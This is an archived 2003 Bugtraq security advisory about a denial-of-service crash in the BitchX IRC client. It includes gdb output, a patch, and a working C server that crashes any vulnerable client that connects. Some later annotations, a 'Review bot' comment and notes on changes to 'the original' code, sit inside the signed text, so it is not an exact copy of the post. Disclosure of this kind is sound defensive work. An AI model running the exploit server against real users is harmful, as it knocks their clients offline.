90962 2003-02-18  05:48  /247 rader/  <argv@hushmail.com>
Importerad: 2003-02-18  05:48  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3538>
Ärende: [argv] BitchX-353 Vulnerability
------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----

Mon Feb 17 15:26:06 EST 2003

1. Topic:
        BitchX IRC Client

2. Relevant versions:
        Vulnerable:
                BitchX-75p3
                BitchX-1.0c16
                BitchX-1.0c19
                BitchX-1.0c20cvs
        Not Vulnerable:
                BitchX-1.0c18

3. Problem description:
        A denial of service vulnerability exists in BitchX. Sending
        a malformed RPL_NAMREPLY numeric 353 causes BitchX to segfault.
        This problem was reported to panasync@efnet#bitchx on
        Jan 30 2003; as of this writing we are unaware of any patches
        or workarounds provided by panasync and/or any members of
        #bitchx.

4. Workaround:
        Patch Included
        Use epic, ircII

5. References:
        http://www.bitchx.org
        http://www.epicsol.org
        http://www.ircii.org

6. Contact:
        argv@hushmail.com


- -----begin gdb.output-----
argv@black:~/BitchX_353/BitchX/source$ gdb ./BitchX
Reading symbols from ./BitchX...done.
(gdb) r argv.matrux.net
Starting program: /home/argv/BitchX_353/BitchX/source/./BitchX argv.matrux.net
BitchX - Based on EPIC Software Labs epic ircII (1998).
Version (BitchX-1.0c20cvs) -- Date (20020325).
Process [30890]
Program received signal SIGSEGV, Segmentation fault.
0x80bcdff in funny_namreply ()
(gdb) info reg
eax            0x0      0
ecx            0xbfffcf34       -1073754316
edx            0x0      0
ebx            0xbfffcf2c       -1073754324
esp            0xbfffcc94       0xbfffcc94
ebp            0xbfffd7b5       0xbfffd7b5
esi            0xbfffd7b8       -1073752136
edi            0x0      0
eip            0x80bcdff        0x80bcdff
eflags         0x10282  66178
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x20     32
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x80d1c7c        135076988
foseg          0x2b     43
fooff          0xbfffe130       -1073749712
fop            0x0      0
(gdb) disass $eip-0x20 $eip+0x20
Dump of assembler code from 0x80bcddf to 0x80bce1f:
0x80bcddf <funny_namreply+19>:  sbb    $0x0,%al
0x80bcde1 <funny_namreply+21>:  add    %al,(%eax)
0x80bcde3 <funny_namreply+23>:  add    %al,0x26af8c4(%ebx)
0x80bcde9 <funny_namreply+29>:  push   %ebx
0x80bcdea <funny_namreply+30>:  mov    0x318(%eax),%eax
0x80bcdf0 <funny_namreply+36>:  call   *%eax
0x80bcdf2 <funny_namreply+38>:  mov    (%ebx),%ebp
0x80bcdf4 <funny_namreply+40>:  mov    0x4(%ebx),%esi
0x80bcdf7 <funny_namreply+43>:  mov    0x8(%ebx),%edi
0x80bcdfa <funny_namreply+46>:  mov    %edi,%edx
0x80bcdfc <funny_namreply+48>:  add    $0x10,%esp
0x80bcdff <funny_namreply+51>:  cmpb   $0x0,(%edi)
0x80bce02 <funny_namreply+54>:  je     0x80bce2f <funny_namreply+99>
0x80bce04 <funny_namreply+56>:  mov    0x1c(%esp,1),%ecx
0x80bce08 <funny_namreply+60>:  inc    %ecx
0x80bce09 <funny_namreply+61>:  cmpb   $0x20,(%edx)
0x80bce0c <funny_namreply+64>:  je     0x80bce1b <funny_namreply+79>
0x80bce0e <funny_namreply+66>:  mov    %esi,%esi
0x80bce10 <funny_namreply+68>:  inc    %edx
0x80bce11 <funny_namreply+69>:  mov    (%edx),%al
0x80bce13 <funny_namreply+71>:  test   %al,%al
0x80bce15 <funny_namreply+73>:  je     0x80bce1b <funny_namreply+79>
0x80bce17 <funny_namreply+75>:  cmp    $0x20,%al
0x80bce19 <funny_namreply+77>:  jne    0x80bce10 <funny_namreply+68>
0x80bce1b <funny_namreply+79>:  mov    %ecx,0x1c(%esp,1)
End of assembler dump.
- -----end gdb.output-----


- -----begin BitchX-1.0c20cvs-353.diff-----
diff -Nru BitchX.orig/source/funny.c BitchX/source/funny.c
- --- BitchX.orig/source/funny.c  Sun Feb 16 18:34:16 2003
+++ BitchX/source/funny.c       Sun Feb 16 18:39:56 2003
@@ -260,7 +260,10 @@
        type = Args[0];
        channel = Args[1];
        line = Args[2];
- -
+       if (channel == NULL || line == NULL) {
+               bitchsay("Invalid number of arguments for %s", __FUNCTION__);
+               return;
+       }
        ptr = line;
        while (*ptr)
        {
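Review bot: The guard added before `ptr = line` uses `__FUNCTION__`, which is a GCC extension; since C99 the portable spelling is `__func__`, so `bitchsay("Invalid number of arguments for %s", __func__);` keeps the diagnostic on other compilers. The check covers `channel` and `line`, the two values the crash dereferences (the gdb trace shows `cmpb $0x0,(%edi)` with `%edi` = 0, matching `while (*ptr)` on a NULL `line`), but `type = Args[0]` stays unchecked; whether it is dereferenced later cannot be seen from the hunk. funny_namreply starts and ends outside the hunk.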
- -----end BitchX-1.0c20cvs-353.diff-----


- -----begin bitchx-353.c-----
/*
 * bitchx-353.c
 * --argv
 * Jan/30/03
 *
 * Vulnerable:
 *      BitchX-75p3
 *      BitchX-1.0c16
 *      BitchX-1.0c19
 *      BitchX-1.0c20cvs
 *
 * Not Vulnerable:
 *      BitchX-1.0c18   (So far..)
 *
 *
 *  Workaround:
 *      in function funny_namreply()
 *      after the PasteArgs(Args, 2);
 *      add in
 *      -- snip --
 *      if (Args[1] == NULL || Args[2] == NULL)
 *                      return;
 *      -- unsnip --
 *
 * ---- the vuln code of bx -----
 *       PasteArgs(Args, 2);
 *       type = Args[0];
 *       channel = Args[1];
 *       line = Args[2];
 *
 *       ptr = line;
 *       while (*ptr)
 *       {
 *               while (*ptr && (*ptr != ' '))
 *                       ptr++;
 *               user_count++;
 *               while (*ptr && (*ptr == ' '))
 *                       ptr++;
 *       }
 * ------------------------------
 *
 * [panasync(panasync@colossus.melnibone.org)] you would hope the irc server would be a trusted source.
 * [hellman(hellman@ipv6.gi-1.au.reroute.se)] 'Free porn at /server irc.owned.com'
 *
 */

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* The single line handed to every client: an RPL_NAMREPLY (numeric 353)
 * with fewer parameters than funny_namreply() expects, so its Args[2]
 * (the name list) comes back NULL and the unchecked `while (*ptr)` in the
 * header comment above dereferences it. Despite the name, this is plain
 * protocol text, not code. */
static char shellcode[] = ":* 353 * =  :\n";    // <-- this could be something worse.

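/*
 * Accept one pending connection on the listening socket fd and print the
 * peer's address and port.
 *
 * Returns the connected descriptor, or -1 if accept() failed (the failure
 * is reported on stderr; errno is left as accept() set it). The caller
 * owns the returned descriptor and must close() it.
 */
int acceptConnection(int fd)
{
   struct sockaddr_in sa;
   socklen_t sal = sizeof sa;   /* accept() expects socklen_t, not int */
   int descriptor = accept(fd, (struct sockaddr *) &sa, &sal);

   if (descriptor < 0) {
      perror("accept");
      return -1;
   }
   /* inet_ntoa() hands back a static buffer; it is consumed immediately here */
   printf("Connection from %s:%d\n", inet_ntoa(sa.sin_addr), ntohs(sa.sin_port));
   return descriptor;
}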


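/*
 * Listen on a TCP port (6667 by default, or argv[1]) and send every client a
 * single malformed RPL_NAMREPLY (353) line before closing the connection.
 * This reproduces the NULL dereference in BitchX's funny_namreply(); a
 * client built with the funny.c guard (channel/line NULL check) logs the
 * bad numeric and ignores it.
 *
 * Returns 1 on a usage error or a socket error (reported on stderr); the
 * accept loop only ends on a persistent accept() failure.
 */
int main(int argc, char **argv)
{
   int port = 6667;

   if (argc > 1) {
      /* strtol instead of atoi so garbage and out-of-range values are rejected */
      char *end = NULL;
      long v = strtol(argv[1], &end, 10);
      if (end == argv[1] || *end != '\0' || v < 1 || v > 65535) {
         fprintf(stderr, "usage: %s [port 1-65535]\n", argv[0]);
         return 1;
      }
      port = (int) v;
   }

   struct sockaddr_in server;
   memset(&server, 0, sizeof server);
   server.sin_family = AF_INET;
   server.sin_port = htons(port);
   server.sin_addr.s_addr = INADDR_ANY;

   int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
   if (sock < 0) {
      perror("socket");
      return 1;
   }
   /* SO_REUSEADDR needs a non-zero option value; the original passed an
    * uninitialised int here, so the option was set only by accident */
   int one = 1;
   if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one) < 0)
      perror("setsockopt");   /* non-fatal: only affects quick restarts */

   if (bind(sock, (struct sockaddr *) &server, sizeof server) == -1) {
      perror("bind");
      close(sock);
      return 1;
   }
   if (listen(sock, 1) == -1) {
      perror("listen");
      close(sock);
      return 1;
   }

   for (;;) {
      int client = acceptConnection(sock);
      if (client < 0) {
         if (errno == EINTR || errno == ECONNABORTED)
            continue;   /* transient; keep serving */
         break;         /* persistent accept() failure: stop instead of spinning */
      }
      size_t len = strlen(shellcode);
      ssize_t n = write(client, shellcode, len);
      if (n < 0 || (size_t) n != len)
         perror("write");   /* the line did not reach the client in full */
      close(client);
   }
   close(sock);
   return 1;
}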
- -----end bitchx-353.c-----

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlkEARECABkFAj5Qa5gSHGFyZ3ZAaHVzaG1haWwuY29tAAoJEO/BXrpp9Bkp5YkAoLkr
CpVMFSHmOyysTyxrDPIMhVpiAJ9KqROclL0CQCxjGxoZSQUvcHoKMg==
=EuNh
-----END PGP SIGNATURE-----




(90962) / <argv@hushmail.com>/----------------------